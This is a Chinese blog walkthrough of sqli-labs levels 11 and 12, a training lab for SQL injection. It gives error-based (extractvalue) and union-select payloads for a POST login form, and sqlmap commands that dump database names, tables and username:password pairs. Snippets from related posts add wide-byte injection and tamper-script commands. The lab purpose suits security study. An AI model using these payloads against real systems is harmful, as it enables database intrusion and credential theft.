2020.4.3 sqli-labs--第十一、十二关①

最新推荐文章于 2024-12-23 17:29:22 发布
原创 最新推荐文章于 2024-12-23 17:29:22 发布 · 614 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了在sqli-labs的第十一、十二关中,如何利用extractvalue和联合查询(union select)进行SQL注入攻击。首先,通过BP抓包并修改POST参数,尝试extractvalue方法进行报错型注入,逐步揭示数据库名、表名、字段名及字段值。其次,使用联合查询构造payload,以显示隐藏内容。最后,推荐使用sqlmap自动化工具,快速完成数据库信息的爆破。第十二关虽然闭合方式有所不同,但整体思路与第十一关相似。

在这里插入图片描述对于post传参的我们最好用bp

输入admin admin 登陆,抓包,发送到repeater模块
在这里插入图片描述在repeater中通过修改post的参数进行注入。

方法一 extractvalue测试payload

uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登陆
uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登陆

在这里插入图片描述说明注入生效,存在报错型注入,接下来又是重复性工作,上extractvalue()

爆数据库名:

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

只能查询到前几个表,后面加上not in ()就可以查到其他表了,如:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not in ('emails')))) --+&passwd=admin&submit=Submit

爆字段名:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆字段值:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

同样使用not in 可以查询其他值:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

在这里插入图片描述

方法二 联合查询union select测试payload

注意uname是错误的,才能显示联合查询内容。

前面构造闭合,中间sql语句,后面注释
在这里插入图片描述在这里插入图片描述爆当前数据库中的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit

字段名:表名要加单引号

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit

字段值:

uname=0' union select 1,group_concat(username,0x3e,password) from users --+&passwd=admin&submit=Submit

第三种方法:sqlmap(强烈推荐)

1.爆数据库名

python sqlmap.py -r source.txt  -p passwd --technique E --dbs --batch

在这里插入图片描述
2.爆表名

python sqlmap.py -r source.txt  -p passwd --technique E -D security --tables --batch

在这里插入图片描述
3.爆字段名

python sqlmap.py -r source.txt  -p passwd --technique E -D security -T users --columns --batch

在这里插入图片描述
4.爆字段值

python sqlmap.py -r source.txt  -p passwd --technique E -D security -T users -C "username,password" --dump --batch

在这里插入图片描述

第十二关

通过源码发现他闭合需要双引号和括号。除了闭合方式有点区别,其他的大致和11题一样。
在这里插入图片描述例如:这里爆其库名:

uname=admin") and extractvalue(1,concat(0x7e,(select database())))  and " &passwd=admin&submit=Submit
sqli-labs第十一十二(post请求爆库)
qq_42266432的博客
08-23 711
第十一开始,有输入框了,先往里面分别填入两个1看看 页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数,说明这不是get请求了,打开hackbar,loadURL发现是以表单方式提交的post请求(刚开始准备使用burp抓包来看请求,结果burp抓取不到本地包就很迷)到这里就可以尝试开始注入了 如上图,uname加上单引号,想要的东西就回显出来了 在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1234
所以,payload分析输入个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqlmap使用教程(sqli-labs11-20)
小同的博客
05-22 926
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
sqli-labs靶场使用sqlmap自动化注入
星虐
03-15 1601
1.检测存在注入 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ 2.爆出所有数据库名称 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ --dbs 3.爆出security库中的所有表 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ -D security --tables 4.爆出users表中的
sqli-labs卡12(基于post提交的双引号闭合的字符型注入)通思路
zyh1588的博客
11-10 857
小白回顾sql注入靶场第12
sqli-labs十二
yuqnqi的博客
05-08 1027
对了,也可以用报错注入,下次再写。由此判断为,双引号反括号闭合;post传值,跟十差不多。就是正常的sql注入流程。第步,判断闭合方式。
sqli-labs第12
weixin_45626840的博客
04-23 427
思路样 闭合类型为 “)
精选资源
2020-10-23-sqli-labs.md
01-24
本例中回显位置为第2和第3个字段。 - **查询数据库信息**: - **数据库名称**:`id=-1' union select 1,database(),3 --+` - **表名**:`id=-1' union select 1,(select group_concat(table_name) from ...
sqli-labs Less-46、47、48、49(sqli-labs指南 46、47、48、49)—order by 相注入
m0_54899775的博客
12-28 1440
sqli-labs Less-46、47、48、49(sqli-labs指南 46、47、48、49)—order by 相注入
sqli-labs-master 过 1-10 (附解题思路及各注入方法解析)
weixin_47306547的博客
08-22 4177
第 1
sqli-labs-master 11-45(附解题思路及各注入方法解析)
weixin_47306547的博客
09-08 1532
准备:BurpSuite 2020.8 安装及代理配置 第 11 -1' union select user(),database() # 第 12 后续步骤与第 11 致 第 13 为便于调试,使用BurpSuite -1') AND EXTRACTVALUE(1,(CONCAT(0x7e,(user()),0x7e))) # 第 14 后续步骤与第 13 致 第 15 使...
sqli注入(1)数据库相知识
c10udz的博客
04-11 810
目录 1.MySQL命令行打开方式 2.MySQL函数 1.MySQL命令行打开方式 前提条件:已经在PHPstudy(2018)上面搭好了sqli-labs靶场。 (1)打开PHP study,找到【其他选项菜单】、【MySQL工具】、【MySQL命令行】,然后输入数据库登录密码即可。 (2)在文件夹找到\phpStudy\PHPTutorial\MySQL\bin目录,使用windows命令进入bin中,输入cmd.exe -mysql -u root -p;(提示结尾有分号),
sqli-labs靶场第十二
gou1791241251的博客
12-27 844
十二第十一差在了单引号和双引号, admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。
sql-labs靶场第十一测试报告
ccc_9wy的博客
10-14 1993
sql-labs第十一的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;联合查询注入。
sqli-labs第十一、第十二
qq_51366383的博客
12-07 529
第十一开始需要使用bp,我这里的都是用的repeater操作的。 判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’
Sqlilabs-12
KAKA的博客
07-07 376
这里到了 12 ,是 11 的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是样的。 这里仍然以 hackbar 为例构造 payload: uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.
sqli-labs卡记录12
m0_59527104的博客
12-23 326
查找到users表下对应的列名:uname=1")union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),2--+&passwd=1&submit=Submit。查找数据库名:uname=1")union select database(),2--+&passwd=1&submit=Submit。
SQLI-labs-第十一和第十二
weixin_54055099的博客
04-28 1351
Sqli-labs的第11和12,有POST方式的联合查询注入
sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/?id=1" --current-db --tamper=unmagicquotes
最新发布
06-21
### 如何使用 SQLMap 结合 `unmagicquotes` tamper 脚本进行宽字节 SQL 注入攻击并提取当前数据库名称 以下内容详细说明如何利用 SQLMap 对目标 URL 进行宽字节 SQL 注入测试,并结合 `unmagicquotes` tamper 脚本来绕过 `magic_quotes_gpc` 防护,最终提取当前数据库名称。 #### 代码示例 以下是完整的命令行代码示例: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/?id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` - `-u`:指定目标 URL。 - `--prefix="%df'"`:设置注入点前缀为 `%df'`,用于模拟宽字节注入场景[^2]。 - `--suffix=" "`:设置注入点后缀为空格,确保 SQL 语句正确闭合。 - `--tamper="unmagicquotes"`:加载 `unmagicquotes` tamper 脚本,专门用于绕过 `magic_quotes_gpc` 防护机制[^2]。 - `--dbms=mysql`:指定目标数据库类型为 MySQL。 - `--level=5` 和 `--risk=3`:提高检测级别和风险等级,确保能够发现潜在漏洞。 - `--current-db`:提取当前数据库名称。 - `--batch`:自动选择默认选项,避免交互式输入。 #### 参数解析 - 宽字节注入的核心在于通过 `%df'` 绕过单引号过滤,这在 GBK 字符集下尤为有效。 - `unmagicquotes` tamper 脚本通过对特殊字符进行编码转换,帮助绕过 `magic_quotes_gpc` 防护机制。 - 提取当前数据库名称的功能由 `--current-db` 参数实现,该参数会自动构造相 SQL 查询以获取数据库名称。 #### 注意事项 - 如果目标环境启用了 WAF 或其他防护机制,可以尝试加载更多 tamper 脚本以增强绕过能力。例如: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/?id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes,randomcomments" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` - `randomcomments` tamper 脚本会在 SQL 键字之间插入随机注释符号(如 `/**/`),进步混淆注入流量[^2]。 - 在某些情况下,可能需要手动调整注入点或使用 `--data` 参数指定 POST 请求数据。例如: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/" --data="id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` #### 测试结果验证 运行上述命令后,SQLMap 将自动检测是否存在宽字节注入漏洞,并尝试提取当前数据库名称。如果成功检测到漏洞并提取到数据库名称,可以在后续操作中使用 `--dbs`、`--tables`、`--columns` 和 `--dump` 等参数进步枚举数据库结构和敏感数据。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值